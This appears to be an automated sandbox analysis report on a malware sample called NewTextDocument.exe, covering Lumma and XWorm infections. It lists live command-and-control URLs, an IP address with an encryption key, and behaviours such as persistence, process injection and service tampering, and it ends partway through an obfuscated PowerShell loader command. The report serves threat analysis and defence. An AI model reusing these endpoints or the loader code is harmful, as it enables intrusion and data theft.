Analysis
-
max time kernel
150s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20250502-en -
resource tags
arch:x64arch:x86image:win10v2004-20250502-enlocale:en-usos:windows10-2004-x64system -
submitted
05/06/2025, 19:12
Static task
static1
Behavioral task
behavioral1
Sample
NewTextDocument.exe
Resource
win10v2004-20250502-en
General
-
Target
NewTextDocument.exe
-
Size
4KB
-
MD5
a239a27c2169af388d4f5be6b52f272c
-
SHA1
0feb9a0cd8c25f01d071e9b2cfc2ae7bd430318c
-
SHA256
98e895f711226a32bfab152e224279d859799243845c46e550c2d32153c619fc
-
SHA512
f30e1ff506cc4d729f7e24aa46e832938a5e21497f1f82f1b300d47f45dae7f1caef032237ef1f5ae9001195c43c0103e3ab787f9196c8397846c1dea8f351da
-
SSDEEP
48:6r1huik0xzYGJZZJOQOulbfSqXSfbNtm:IIxcLpf6zNt
Malware Config
Extracted
lumma
https://t.me/vstalnasral555
https://runtnwq.run/gajh
https://narrathfpt.top/tekq
https://escczlv.top/bufi
https://localixbiw.top/zlpa
https://korxddl.top/qidz
https://stochalyqp.xyz/alfp
https://diecam.top/laur/api
https://citellcagt.top/gjtu
https://peppinqikp.xyz/xaow
Extracted
xworm
5.0
154.53.41.5:1144
tHwBSicFuDZAqRPQ
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral1/files/0x00070000000241f1-147.dat family_xworm behavioral1/memory/3604-251-0x0000000000690000-0x000000000069E000-memory.dmp family_xworm -
Lumma family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description pid Process procid_target PID 2344 created 608 2344 powershell.EXE 5 PID 6084 created 608 6084 powershell.EXE 5 -
Xworm family
-
pid Process 2344 powershell.EXE 6084 powershell.EXE 1608 powershell.exe 2244 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file 4 IoCs
flow pid Process 9 5500 NewTextDocument.exe 9 5500 NewTextDocument.exe 9 5500 NewTextDocument.exe 32 5500 NewTextDocument.exe -
Stops running service(s) 4 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3342576763-1998465526-3870295501-1000\Control Panel\International\Geo\Nation NewTextDocument.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ChannelName.vbs hJ5bmFj.exe -
Executes dropped EXE 16 IoCs
pid Process 5684 1UGwDFF.exe 4532 t3u2Imz.exe 4884 hJ5bmFj.exe 6012 94mG4Ak.exe 3604 XClient.exe 3504 hJ5bmFj.exe 1380 hJ5bmFj.exe 6024 hJ5bmFj.exe 1820 hJ5bmFj.exe 1628 jxlvfvkylpsp.exe 5816 hJ5bmFj.exe 1592 hJ5bmFj.exe 4784 hJ5bmFj.exe 2224 hJ5bmFj.exe 4592 hJ5bmFj.exe 4632 hJ5bmFj.exe -
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 3836 powercfg.exe 2968 powercfg.exe 4808 powercfg.exe 4348 powercfg.exe 1004 powercfg.exe 5292 powercfg.exe 5860 powercfg.exe 5600 powercfg.exe -
Drops file in System32 directory 16 IoCs
description ioc Process File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File opened for modification C:\Windows\system32\MRT.exe 1UGwDFF.exe File opened for modification C:\Windows\system32\MRT.exe jxlvfvkylpsp.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe -
Suspicious use of SetThreadContext 8 IoCs
description pid Process procid_target PID 4532 set thread context of 4768 4532 t3u2Imz.exe 95 PID 6012 set thread context of 1356 6012 94mG4Ak.exe 104 PID 5684 set thread context of 2480 5684 1UGwDFF.exe 127 PID 1628 set thread context of 4916 1628 jxlvfvkylpsp.exe 172 PID 1628 set thread context of 4180 1628 jxlvfvkylpsp.exe 173 PID 1628 set thread context of 924 1628 jxlvfvkylpsp.exe 178 PID 2344 set thread context of 2596 2344 powershell.EXE 180 PID 6084 set thread context of 1552 6084 powershell.EXE 182 -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4360 sc.exe 2196 sc.exe 772 sc.exe 6044 sc.exe 4984 sc.exe 1952 sc.exe 5340 sc.exe 4940 sc.exe 5948 sc.exe 5156 sc.exe 4020 sc.exe 4720 sc.exe 3640 sc.exe 3164 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language hJ5bmFj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates dialer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Thu, 05 Jun 2025 19:14:42 GMT" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4768 MSBuild.exe 4768 MSBuild.exe 4768 MSBuild.exe 4768 MSBuild.exe 1356 MSBuild.exe 1356 MSBuild.exe 1356 MSBuild.exe 1356 MSBuild.exe 5684 1UGwDFF.exe 1608 powershell.exe 1608 powershell.exe 1608 powershell.exe 5684 1UGwDFF.exe 5684 1UGwDFF.exe 5684 1UGwDFF.exe 5684 1UGwDFF.exe 5684 1UGwDFF.exe 5684 1UGwDFF.exe 5684 1UGwDFF.exe 5684 1UGwDFF.exe 5684 1UGwDFF.exe 5684 1UGwDFF.exe 5684 1UGwDFF.exe 5684 1UGwDFF.exe 5684 1UGwDFF.exe 5684 1UGwDFF.exe 5684 1UGwDFF.exe 4884 hJ5bmFj.exe 4884 hJ5bmFj.exe 4884 hJ5bmFj.exe 4884 hJ5bmFj.exe 4884 hJ5bmFj.exe 4884 hJ5bmFj.exe 4884 hJ5bmFj.exe 4884 hJ5bmFj.exe 4884 hJ5bmFj.exe 4884 hJ5bmFj.exe 4884 hJ5bmFj.exe 4884 hJ5bmFj.exe 4884 hJ5bmFj.exe 4884 hJ5bmFj.exe 4884 hJ5bmFj.exe 4884 hJ5bmFj.exe 4884 hJ5bmFj.exe 4884 hJ5bmFj.exe 4884 hJ5bmFj.exe 4884 hJ5bmFj.exe 1628 jxlvfvkylpsp.exe 2344 powershell.EXE 2344 powershell.EXE 2344 powershell.EXE 2244 powershell.exe 2244 powershell.exe 1628 jxlvfvkylpsp.exe 1628 jxlvfvkylpsp.exe 1628 jxlvfvkylpsp.exe 1628 jxlvfvkylpsp.exe 1628 jxlvfvkylpsp.exe 1628 jxlvfvkylpsp.exe 1628 jxlvfvkylpsp.exe 1628 jxlvfvkylpsp.exe 1628 jxlvfvkylpsp.exe 1628 jxlvfvkylpsp.exe 1628 jxlvfvkylpsp.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 5500 NewTextDocument.exe Token: SeDebugPrivilege 4884 hJ5bmFj.exe Token: SeDebugPrivilege 3604 XClient.exe Token: SeDebugPrivilege 1608 powershell.exe Token: SeShutdownPrivilege 1004 powercfg.exe Token: SeCreatePagefilePrivilege 1004 powercfg.exe Token: SeShutdownPrivilege 5292 powercfg.exe Token: SeCreatePagefilePrivilege 5292 powercfg.exe Token: SeShutdownPrivilege 5600 powercfg.exe Token: SeCreatePagefilePrivilege 5600 powercfg.exe Token: SeShutdownPrivilege 5860 powercfg.exe Token: SeCreatePagefilePrivilege 5860 powercfg.exe Token: SeDebugPrivilege 4884 hJ5bmFj.exe Token: SeDebugPrivilege 2344 powershell.EXE Token: SeDebugPrivilege 2244 powershell.exe Token: SeLockMemoryPrivilege 924 dialer.exe Token: SeShutdownPrivilege 3836 powercfg.exe Token: SeCreatePagefilePrivilege 3836 powercfg.exe Token: SeShutdownPrivilege 4808 powercfg.exe Token: SeCreatePagefilePrivilege 4808 powercfg.exe Token: SeShutdownPrivilege 2968 powercfg.exe Token: SeCreatePagefilePrivilege 2968 powercfg.exe Token: SeShutdownPrivilege 4348 powercfg.exe Token: SeCreatePagefilePrivilege 4348 powercfg.exe Token: SeDebugPrivilege 2344 powershell.EXE Token: SeDebugPrivilege 2596 dllhost.exe Token: SeAssignPrimaryTokenPrivilege 2088 svchost.exe Token: SeIncreaseQuotaPrivilege 2088 svchost.exe Token: SeSecurityPrivilege 2088 svchost.exe Token: SeTakeOwnershipPrivilege 2088 svchost.exe Token: SeLoadDriverPrivilege 2088 svchost.exe Token: SeSystemtimePrivilege 2088 svchost.exe Token: SeBackupPrivilege 2088 svchost.exe Token: SeRestorePrivilege 2088 svchost.exe Token: SeShutdownPrivilege 2088 svchost.exe Token: SeSystemEnvironmentPrivilege 2088 svchost.exe Token: SeUndockPrivilege 2088 svchost.exe Token: SeManageVolumePrivilege 2088 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2088 svchost.exe Token: SeIncreaseQuotaPrivilege 2088 svchost.exe Token: SeSecurityPrivilege 2088 svchost.exe Token: SeTakeOwnershipPrivilege 2088 svchost.exe Token: SeLoadDriverPrivilege 2088 svchost.exe Token: SeSystemtimePrivilege 2088 svchost.exe Token: SeBackupPrivilege 2088 svchost.exe Token: SeRestorePrivilege 2088 svchost.exe Token: SeShutdownPrivilege 2088 svchost.exe Token: SeSystemEnvironmentPrivilege 2088 svchost.exe Token: SeUndockPrivilege 2088 svchost.exe Token: SeManageVolumePrivilege 2088 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2088 svchost.exe Token: SeIncreaseQuotaPrivilege 2088 svchost.exe Token: SeSecurityPrivilege 2088 svchost.exe Token: SeTakeOwnershipPrivilege 2088 svchost.exe Token: SeLoadDriverPrivilege 2088 svchost.exe Token: SeSystemtimePrivilege 2088 svchost.exe Token: SeBackupPrivilege 2088 svchost.exe Token: SeRestorePrivilege 2088 svchost.exe Token: SeShutdownPrivilege 2088 svchost.exe Token: SeSystemEnvironmentPrivilege 2088 svchost.exe Token: SeUndockPrivilege 2088 svchost.exe Token: SeManageVolumePrivilege 2088 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2088 svchost.exe Token: SeIncreaseQuotaPrivilege 2088 svchost.exe -
Suspicious use of UnmapMainImage 2 IoCs
pid Process 3972 RuntimeBroker.exe 3552 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5500 wrote to memory of 5684 5500 NewTextDocument.exe 90 PID 5500 wrote to memory of 5684 5500 NewTextDocument.exe 90 PID 5500 wrote to memory of 4532 5500 NewTextDocument.exe 93 PID 5500 wrote to memory of 4532 5500 NewTextDocument.exe 93 PID 4532 wrote to memory of 4768 4532 t3u2Imz.exe 95 PID 4532 wrote to memory of 4768 4532 t3u2Imz.exe 95 PID 4532 wrote to memory of 4768 4532 t3u2Imz.exe 95 PID 4532 wrote to memory of 4768 4532 t3u2Imz.exe 95 PID 4532 wrote to memory of 4768 4532 t3u2Imz.exe 95 PID 4532 wrote to memory of 4768 4532 t3u2Imz.exe 95 PID 4532 wrote to memory of 4768 4532 t3u2Imz.exe 95 PID 4532 wrote to memory of 4768 4532 t3u2Imz.exe 95 PID 4532 wrote to memory of 4768 4532 t3u2Imz.exe 95 PID 5500 wrote to memory of 4884 5500 NewTextDocument.exe 98 PID 5500 wrote to memory of 4884 5500 NewTextDocument.exe 98 PID 5500 wrote to memory of 4884 5500 NewTextDocument.exe 98 PID 5500 wrote to memory of 6012 5500 NewTextDocument.exe 99 PID 5500 wrote to memory of 6012 5500 NewTextDocument.exe 99 PID 5500 wrote to memory of 3604 5500 NewTextDocument.exe 102 PID 5500 wrote to memory of 3604 5500 NewTextDocument.exe 102 PID 6012 wrote to memory of 5788 6012 94mG4Ak.exe 103 PID 6012 wrote to memory of 5788 6012 94mG4Ak.exe 103 PID 6012 wrote to memory of 5788 6012 94mG4Ak.exe 103 PID 6012 wrote to memory of 1356 6012 94mG4Ak.exe 104 PID 6012 wrote to memory of 1356 6012 94mG4Ak.exe 104 PID 6012 wrote to memory of 1356 6012 94mG4Ak.exe 104 PID 6012 wrote to memory of 1356 6012 94mG4Ak.exe 104 PID 6012 wrote to memory of 1356 6012 94mG4Ak.exe 104 PID 6012 wrote to memory of 1356 6012 94mG4Ak.exe 104 PID 6012 wrote to memory of 1356 6012 94mG4Ak.exe 104 PID 6012 wrote to memory of 1356 6012 94mG4Ak.exe 104 PID 6012 wrote to memory of 1356 6012 94mG4Ak.exe 104 PID 2892 wrote to memory of 2616 2892 cmd.exe 113 PID 2892 wrote to memory of 2616 2892 cmd.exe 113 PID 5684 wrote to memory of 2480 5684 1UGwDFF.exe 127 PID 5684 wrote to memory of 2480 5684 1UGwDFF.exe 127 PID 5684 wrote to memory of 2480 5684 1UGwDFF.exe 127 PID 5684 wrote to memory of 2480 5684 1UGwDFF.exe 127 PID 5684 wrote to memory of 2480 5684 1UGwDFF.exe 127 PID 5684 wrote to memory of 2480 5684 1UGwDFF.exe 127 PID 4884 wrote to memory of 3504 4884 hJ5bmFj.exe 141 PID 4884 wrote to memory of 3504 4884 hJ5bmFj.exe 141 PID 4884 wrote to memory of 3504 4884 hJ5bmFj.exe 141 PID 4884 wrote to memory of 3504 4884 hJ5bmFj.exe 141 PID 4884 wrote to memory of 1380 4884 hJ5bmFj.exe 142 PID 4884 wrote to memory of 1380 4884 hJ5bmFj.exe 142 PID 4884 wrote to memory of 1380 4884 hJ5bmFj.exe 142 PID 4884 wrote to memory of 1380 4884 hJ5bmFj.exe 142 PID 4884 wrote to memory of 6024 4884 hJ5bmFj.exe 143 PID 4884 wrote to memory of 6024 4884 hJ5bmFj.exe 143 PID 4884 wrote to memory of 6024 4884 hJ5bmFj.exe 143 PID 4884 wrote to memory of 6024 4884 hJ5bmFj.exe 143 PID 4884 wrote to memory of 1820 4884 hJ5bmFj.exe 145 PID 4884 wrote to memory of 1820 4884 hJ5bmFj.exe 145 PID 4884 wrote to memory of 1820 4884 hJ5bmFj.exe 145 PID 4884 wrote to memory of 1820 4884 hJ5bmFj.exe 145 PID 4884 wrote to memory of 5816 4884 hJ5bmFj.exe 146 PID 4884 wrote to memory of 5816 4884 hJ5bmFj.exe 146 PID 4884 wrote to memory of 5816 4884 hJ5bmFj.exe 146 PID 4884 wrote to memory of 5816 4884 hJ5bmFj.exe 146 PID 4884 wrote to memory of 1592 4884 hJ5bmFj.exe 147 PID 4884 wrote to memory of 1592 4884 hJ5bmFj.exe 147 PID 4884 wrote to memory of 1592 4884 hJ5bmFj.exe 147 PID 4884 wrote to memory of 1592 4884 hJ5bmFj.exe 147 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:608
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:316
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{ad13a311-2a06-4d5b-a28d-c2c488daadcb}2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2596
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{baac7772-f4f1-4c81-bef4-89a906e4264d}2⤵PID:1552
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:656
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:948
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:408
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:868
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1132
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2928
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:YzbKDlkEvoiP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$NOOBoIueVBTvCZ,[Parameter(Position=1)][Type]$mPhNQzYMLi)$bYTABmYnzBr=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+[Char](108)+''+'e'+''+[Char](99)+''+[Char](116)+'e'+'d'+'D'+[Char](101)+'l'+'e'+''+[Char](103)+'a'+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'n'+'M'+'e'+[Char](109)+''+[Char](111)+''+'r'+''+[Char](121)+''+[Char](77)+''+'o'+''+[Char](100)+'u'+'l'+''+[Char](101)+'',$False).DefineType('M'+'y'+''+[Char](68)+''+[Char](101)+''+'l'+''+'e'+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+'T'+'y'+''+[Char](112)+''+'e'+'','Class,'+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+'c'+''+','+'S'+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+'si'+'C'+''+[Char](108)+'a'+'s'+''+[Char](115)+''+[Char](44)+''+[Char](65)+'u'+'t'+''+[Char](111)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s',[MulticastDelegate]);$bYTABmYnzBr.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+'p'+[Char](101)+''+[Char](99)+''+[Char](105)+'a'+[Char](108)+''+[Char](78)+''+[Char](97)+''+[Char](109)+'e'+','+''+'H'+''+[Char](105)+'d'+[Char](101)+''+'B'+''+'y'+''+[Char](83)+''+'i'+'g,'+[Char](80)+''+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$NOOBoIueVBTvCZ).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+'t'+[Char](105)+''+[Char](109)+''+[Char](101)+','+[Char](77)+''+[Char](97)+''+[Char](110)+'a'+'g'+'e'+[Char](100)+'');$bYTABmYnzBr.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+[Char](111)+''+[Char](107)+'e',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+'i'+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+'S'+[Char](105)+''+[Char](103)+','+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+'l'+[Char](111)+''+'t'+''+[Char](44)+''+[Char](86)+''+[Char](105)+'r'+'t'+'u'+'a'+''+[Char](108)+'',$mPhNQzYMLi,$NOOBoIueVBTvCZ).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+''+'i'+''+[Char](109)+'e'+[Char](44)+''+'M'+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+'e'+''+[Char](100)+'');Write-Output $bYTABmYnzBr.CreateType();}$mROtnFNlpOpQK=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And 